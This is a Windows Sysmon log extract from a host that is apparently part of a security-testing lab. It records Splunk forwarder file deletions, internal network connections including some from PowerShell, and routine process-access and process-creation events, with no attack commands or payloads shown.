13:17:26.081{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88B225AC17CAC3BF476E086183BB5849,SHA256=24C02B5F06514C7A1295078D36839EA22FB5760BD2E153B71824D05686221805,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
Sysmon events from win-host-987.attackrange.local, Channel=Microsoft-Windows-Sysmon/Operational (Keywords=0x8000000000000000; Level=4; Opcode=0; schema Version=5 for EventID 1 ProcessCreate, 3 NetworkConnect and 23 FileDelete, Version=3 for EventID 10 ProcessAccess). One record per line, fields as Key=Value separated by "; ", in the order of the extract.
EventID=23; RecordID=36497483; UtcTime=2021-09-14 13:17:27.679; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security; Hashes=MD5=68A8C9915C15827B467948CBBA5C962E,SHA256=B554638F2BF3B478B07ECA4DEC0B1C83A1B2E17DE0815F0A10CF7E2149697545,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
EventID=23; RecordID=36497482; UtcTime=2021-09-14 13:17:27.099; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=B92BB4C8C93E7D45D9A774B8246F8011,SHA256=7D1B27255E09C6B830F1347F9F963250A282A95D9BBD2529C30FE567A1FBA32E,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
EventID=23; RecordID=36497484; UtcTime=2021-09-14 13:17:28.113; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=BB399616FA7FE0565456715541280183,SHA256=7E694A829D8101F46C9E03A8FFC6E26719E4577123155EE50C679E531DD22C0F,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
EventID=23; RecordID=36497486; UtcTime=2021-09-14 13:17:29.627; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational; Hashes=MD5=594718D38099533E015094E457901927,SHA256=E2A10ADE62216CD7A932524E83B8A0EEAD0E4E4EC7CE41D23EAE492D16EF1DBC,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
EventID=23; RecordID=36497485; UtcTime=2021-09-14 13:17:29.159; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=988D66476F94B16F7CEC3C70A89717F8,SHA256=69E807199B5CD51C7742FF0BFC4106C275E1C55134ADB30979ECC1BF4CEEC31C,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
EventID=3; RecordID=36497488; UtcTime=2021-09-14 13:18:00.128; ProcessGuid={B81B27B7-4822-613A-788F-03000000C801}; ProcessId=6940; Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; User=ATTACKRANGE\REED_SCHMIDT; Protocol=tcp; Initiated=true; SourceIsIpv6=false; SourceIp=10.0.1.15; SourceHostname=win-host-987.attackrange.local; SourcePort=50535; SourcePortName=-; DestinationIsIpv6=false; DestinationIp=10.0.1.16; DestinationHostname=ip-10-0-1-16.us-west-2.compute.internal; DestinationPort=443; DestinationPortName=https
EventID=23; RecordID=36497487; UtcTime=2021-09-14 13:17:30.176; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=DAE7FAE5BE8E275018623283ACEBAFB9,SHA256=D25BE87FC08927D6FB90BAC06E061ADDB13E2915FA7534F36404C4ABE6421325,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
EventID=23; RecordID=36497489; UtcTime=2021-09-14 13:17:31.193; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=FB3E097A417CADB5B4A68CE2864E9585,SHA256=A66679C29ACD1AC4566CDADC9B28CDA2B070B99D3BA587CEC5BCD23DC7E63463,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
EventID=3; RecordID=36497492; UtcTime=2021-09-14 13:18:01.925; ProcessGuid={B81B27B7-401D-611D-6900-00000000C801}; ProcessId=3616; Image=C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe; User=NT AUTHORITY\SYSTEM; Protocol=tcp; Initiated=true; SourceIsIpv6=false; SourceIp=10.0.1.15; SourceHostname=win-host-987.attackrange.local; SourcePort=50536; SourcePortName=-; DestinationIsIpv6=false; DestinationIp=10.0.1.12; DestinationHostname=-; DestinationPort=8000; DestinationPortName=-
EventID=23; RecordID=36497491; UtcTime=2021-09-14 13:17:32.539; ProcessGuid={B81B27B7-4013-611D-2700-00000000C801}; ProcessId=2076; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xml; Hashes=MD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
EventID=23; RecordID=36497490; UtcTime=2021-09-14 13:17:32.208; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=4A43BD5A9922FF2989D611C5FFD8FD35,SHA256=50D13E730106844249E31D1C290CC5CBB8B97853940A2FDD2734AD38234614E9,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
EventID=23; RecordID=36497494; UtcTime=2021-09-14 13:17:33.475; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational; Hashes=MD5=A399E827461D8279FC7A3C8855E067C8,SHA256=0BF2F0FB61EF27177F2AC1B9DD58506DF8B4FF9DBA1B568CB6E67E92EEB8B219,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
EventID=23; RecordID=36497493; UtcTime=2021-09-14 13:17:33.223; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=55EAE3C030D681BE70BB8940425C1A73,SHA256=4C0B5FF48DB226CCC2E5008BD995E1B9F6BCB559796EC601AF0BB32AAE2D881F,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
EventID=23; RecordID=36497497; UtcTime=2021-09-14 13:17:34.237; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=377AA4D5B2C9ED401A2D002AB0D61D7F,SHA256=FF14D949BF8E1827FF2C682A33C9AF86C45076E5C19D43450FE721A3173E24E8,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
EventID=3; RecordID=36497496; UtcTime=2021-09-14 13:18:04.207; ProcessGuid={B81B27B7-4013-611D-2700-00000000C801}; ProcessId=2076; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe; User=NT AUTHORITY\SYSTEM; Protocol=tcp; Initiated=true; SourceIsIpv6=false; SourceIp=10.0.1.15; SourceHostname=win-host-987.attackrange.local; SourcePort=50538; SourcePortName=-; DestinationIsIpv6=false; DestinationIp=10.0.1.12; DestinationHostname=-; DestinationPort=8089; DestinationPortName=-
EventID=3; RecordID=36497495; UtcTime=2021-09-14 13:18:04.139; ProcessGuid={B81B27B7-4822-613A-788F-03000000C801}; ProcessId=6940; Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; User=ATTACKRANGE\REED_SCHMIDT; Protocol=tcp; Initiated=true; SourceIsIpv6=false; SourceIp=10.0.1.15; SourceHostname=win-host-987.attackrange.local; SourcePort=50537; SourcePortName=-; DestinationIsIpv6=false; DestinationIp=10.0.1.16; DestinationHostname=ip-10-0-1-16.us-west-2.compute.internal; DestinationPort=443; DestinationPortName=https
EventID=23; RecordID=36497498; UtcTime=2021-09-14 13:17:35.269; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=52EF6EC9820FD63375C8B234872001E9,SHA256=9705B2ABD23CB6D9A17CD2A3BB1BD0CBFED876B231DEE230D84B66B68786E71F,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
EventID=23; RecordID=36497499; UtcTime=2021-09-14 13:17:36.351; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=D2A2897843039156489164271E187084,SHA256=2E86E9399C1B0C32FEF092E4F635973AC77D5C466BC68BCE8FCFBA52ED631A79,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
EventID=10; RecordID=36497509; UtcTime=2021-09-14 13:17:37.919; SourceProcessGUID={B81B27B7-4014-611D-3000-00000000C801}; SourceProcessId=3144; SourceThreadId=3164; SourceImage=C:\Windows\system32\conhost.exe; TargetProcessGUID={B81B27B7-A0F1-6140-8356-04000000C801}; TargetProcessId=5596; TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10; RecordID=36497508; UtcTime=2021-09-14 13:17:37.919; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801}; SourceProcessId=732; SourceThreadId=4464; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801}; TargetProcessId=1820; TargetImage=C:\Windows\sysmon64.exe; GrantedAccess=0x1400; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10; RecordID=36497507; UtcTime=2021-09-14 13:17:37.919; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801}; SourceProcessId=732; SourceThreadId=4464; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801}; TargetProcessId=1820; TargetImage=C:\Windows\sysmon64.exe; GrantedAccess=0x1400; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10; RecordID=36497506; UtcTime=2021-09-14 13:17:37.919; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801}; SourceProcessId=732; SourceThreadId=4464; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801}; TargetProcessId=1820; TargetImage=C:\Windows\sysmon64.exe; GrantedAccess=0x1400; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10; RecordID=36497505; UtcTime=2021-09-14 13:17:37.919; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801}; SourceProcessId=732; SourceThreadId=4464; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801}; TargetProcessId=1820; TargetImage=C:\Windows\sysmon64.exe; GrantedAccess=0x1400; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10; RecordID=36497504; UtcTime=2021-09-14 13:17:37.919; SourceProcessGUID={B81B27B7-4012-611D-0500-00000000C801}; SourceProcessId=420; SourceThreadId=436; SourceImage=C:\Windows\system32\csrss.exe; TargetProcessGUID={B81B27B7-A0F1-6140-8356-04000000C801}; TargetProcessId=5596; TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventID=10; RecordID=36497503; UtcTime=2021-09-14 13:17:37.919; SourceProcessGUID={B81B27B7-4013-611D-2700-00000000C801}; SourceProcessId=2076; SourceThreadId=3760; SourceImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe; TargetProcessGUID={B81B27B7-A0F1-6140-8356-04000000C801}; TargetProcessId=5596; TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=1; RecordID=36497502; UtcTime=2021-09-14 13:17:37.904; ProcessGuid={B81B27B7-A0F1-6140-8356-04000000C801}; ProcessId=5596; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe; FileVersion=-; Description=-; Product=-; Company=-; OriginalFileName=-; CommandLine="C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2; CurrentDirectory=C:\Windows\system32\; User=NT AUTHORITY\SYSTEM; LogonGuid={B81B27B7-4012-611D-E703-000000000000}; LogonId=0x3e7; TerminalSessionId=0; IntegrityLevel=System; Hashes=MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C; ParentProcessGuid={B81B27B7-4013-611D-2700-00000000C801}; ParentProcessId=2076; ParentImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe; ParentCommandLine="C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
EventID=23; RecordID=36497501; UtcTime=2021-09-14 13:17:37.369; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=B833ED3806E82C223AF67A24FB7E2962,SHA256=7144445BDF2DD92D639E8F7D770285A6C08675754E91C28BA3611D1A298A267F,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
EventID=3; RecordID=36497500; UtcTime=2021-09-14 13:18:06.936; ProcessGuid={B81B27B7-401D-611D-6900-00000000C801}; ProcessId=3616; Image=C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe; User=NT AUTHORITY\SYSTEM; Protocol=tcp; Initiated=true; SourceIsIpv6=false; SourceIp=10.0.1.15; SourceHostname=win-host-987.attackrange.local; SourcePort=50539; SourcePortName=-; DestinationIsIpv6=false; DestinationIp=10.0.1.12; DestinationHostname=-; DestinationPort=8000; DestinationPortName=-
EventID=23; RecordID=36497522; UtcTime=2021-09-14 13:17:38.934; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security; Hashes=MD5=053BED5C4A8BE1A77FACB3AE38331655,SHA256=1E0933F1059FE85309E9616773E5E22BCC21DEFACFAC525B4FA2AADB3DAC364A,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
EventID=23; RecordID=36497521; UtcTime=2021-09-14 13:17:38.934; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security; Hashes=MD5=1BD2422E2FD1EA73C7D1BB02DD162AFC,SHA256=D0A8A418097A4ED72ACCF6AF9385CCEA4E74244666A228DB0F2450AC532E8410,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
EventID=10; RecordID=36497520; UtcTime=2021-09-14 13:17:38.818; SourceProcessGUID={B81B27B7-A0F2-6140-8456-04000000C801}; SourceProcessId=5964; SourceThreadId=3384; SourceImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe; TargetProcessGUID={B81B27B7-4013-611D-2700-00000000C801}; TargetProcessId=2076; TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe; GrantedAccess=0x101400; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10; RecordID=36497519; UtcTime=2021-09-14 13:17:38.619; SourceProcessGUID={B81B27B7-4014-611D-3000-00000000C801}; SourceProcessId=3144; SourceThreadId=3164; SourceImage=C:\Windows\system32\conhost.exe; TargetProcessGUID={B81B27B7-A0F2-6140-8456-04000000C801}; TargetProcessId=5964; TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10; RecordID=36497518; UtcTime=2021-09-14 13:17:38.619; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801}; SourceProcessId=732; SourceThreadId=4464; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801}; TargetProcessId=1820; TargetImage=C:\Windows\sysmon64.exe; GrantedAccess=0x1400; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10; RecordID=36497517; UtcTime=2021-09-14 13:17:38.619; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801}; SourceProcessId=732; SourceThreadId=4464; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801}; TargetProcessId=1820; TargetImage=C:\Windows\sysmon64.exe; GrantedAccess=0x1400; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10; RecordID=36497516; UtcTime=2021-09-14 13:17:38.619; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801}; SourceProcessId=732; SourceThreadId=4464; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801}; TargetProcessId=1820; TargetImage=C:\Windows\sysmon64.exe; GrantedAccess=0x1400; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
